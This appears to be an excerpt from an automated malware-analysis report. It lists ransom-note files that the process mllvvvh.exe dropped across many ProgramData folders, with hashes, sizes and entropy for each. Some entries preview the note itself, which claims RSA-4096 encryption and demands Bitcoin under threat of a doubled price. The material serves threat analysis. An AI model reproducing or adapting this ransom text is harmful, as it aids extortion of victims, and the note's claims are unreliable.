                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Temp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Temp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Temp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  C:\ProgramData\Microsoft\Settings\Accounts\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Settings\Accounts\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Settings\Accounts\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Settings\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
